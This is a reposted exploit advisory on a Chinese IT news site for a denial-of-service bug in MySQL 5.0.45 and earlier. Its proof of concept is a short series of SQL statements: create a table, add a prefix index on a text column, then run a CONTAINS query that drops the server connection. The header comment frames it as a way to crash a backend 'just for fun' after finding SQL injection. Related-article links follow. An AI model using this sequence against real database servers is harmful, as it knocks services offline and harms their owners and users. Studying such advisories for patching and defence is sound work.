当前位置：移动技术网 > IT编程>数据库>Mysql > mysql 5.0.45 （修改）拒绝服务漏洞

mysql 5.0.45 （修改）拒绝服务漏洞

2017年12月12日 | 移动技术网IT编程 | 我要评论

mysql 5.0.45 （修改）拒绝服务漏洞
/*
* mysql <=6.0 possibly affected
* kristian erik hermansen
* credit: joe gallo
* you must have alter permissions to exploit this bug!
* scenario: you found sql injection, but you want to punch backend server
* in the nuts just for fun. start with the alter table statement on
* a table and field you know to exist. the first two sql statements are
* simply to demostrate reproducibility...
*/

<snip>
mysql> create table `test` (
`id` int(10) unsigned not null auto_increment primary key,
`foo` text not null
) engine=innodb default charset=latin1;
query ok, 0 rows affected

mysql> select * from test where contains(foo, ''bar'');
empty set

mysql> alter table test add index (foo(100));
query ok, 0 rows affected
records: 0 duplicates: 0 warnings: 0

mysql> select * from test where contains(foo, ''bar'');
error 2013 : lost connection to mysql server during query
</snip>

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

Lua脚本:Linux下如何安装Lua环境和解决依赖问题

Lua脚本介绍Lua是一款基于C编写的脚本语言设计目的:通过灵活嵌入应用程中从而为应用程序提供灵活的扩展和定制功... [阅读全文]
SSD原理及Pytorch代码解读——网络架构（二）：特征提取网络及总体计算过程

特征提取网络前面我们已经知道了SSD采用PriorBox机制，也知道了SSD多层特征图来做物体检测，浅层的特征图... [阅读全文]
redis数据库1

大纲：理论：数据库分类Redis重要特性redis应用场景实验：安装redisredis基本操作命令redis持... [阅读全文]
第十五周作业作业

1、导入hellodb.sql生成数据库(1)在students表中，查询年龄大于25岁，且为男性的同学的名字和... [阅读全文]
一致性Hash分析

Hash算法应用场景Hash算法在很多分布式集群产品中都有应用，比如分布式集群架构Redis、Hadoop、El... [阅读全文]
【嵌入式系统】工作模式与任务特权级

【嵌入式系统】工作模式与任务特权级1、工作模式中断模式：调用中断服务程序(ISR, Interrupt Serv... [阅读全文]
集合类 ArrayList 和 LinkedList 直接用 Innodb（MySQL 5.0

比如说对于一个简单的年龄字段，严谨来说应该使用 tinyint（1字节）或者 smallint(2字节)，但是你... [阅读全文]
暑期记录

本周学习MySQL安装使用yum安装所需软件包[root@localhost ~]# yum -y instal... [阅读全文]
MySQL-主从同步配置架构的实现

mysql主从同步原理：master记录数据更改操作-启用binlog日志-设置binlog日志格式-设置ser... [阅读全文]
Kafka控制器

1.ZookeeperZookeeper对Kafka集群的管理操作主要是用了它的两个功能节点（临时节点【zook... [阅读全文]

网友评论


验证码：

mysql 5.0.45 （修改）拒绝服务漏洞

2017年12月12日 | 移动技术网IT编程 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论